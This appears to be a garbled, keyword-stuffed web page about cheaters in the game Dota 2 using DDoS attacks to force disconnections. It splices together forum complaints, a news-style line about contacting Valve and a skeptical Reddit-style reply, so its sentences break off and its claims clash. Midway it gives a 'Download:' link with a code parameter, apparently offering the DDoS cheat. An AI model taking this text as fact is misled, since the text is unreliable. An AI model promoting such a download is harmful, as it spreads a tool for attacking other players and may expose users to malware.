Over the years of DOTA2, cheaters DDOSing the server to cause the game to be safe However, the worst part of this is that the cheater can even DDOS the. HELP! I was playing Battle cup today and find out there are players are using DDoS disconnection hack. Ive lost because of that. We've contacted Valve for comment and will respond with any update. The matches are up and running again. A DDOS is a rudimentary form of hack. Download: bltadwin.ru?code=XZzfc5ZcluIqQsY0HLalX1T5O44iLVPdoRkDescription bltadwin.ru 2 cheater, dota 2 cheats, dota 2 cheaters, читер. · When this cheat is used, games are immediately safe to leave and no stats recorded. You will not be able to find these matches on Dotabuff. It's hard to find. Dota 2 DDOS. Bug. Close. 0. Posted by 1 month ago. Maybe your internet is shit, it’s more likely than a Dota player having the ability to hack Valves network, get your IP address and the have the resources available to DDOS someone over a game of Dota Reply. Share. Report Save. level 2 · 1m.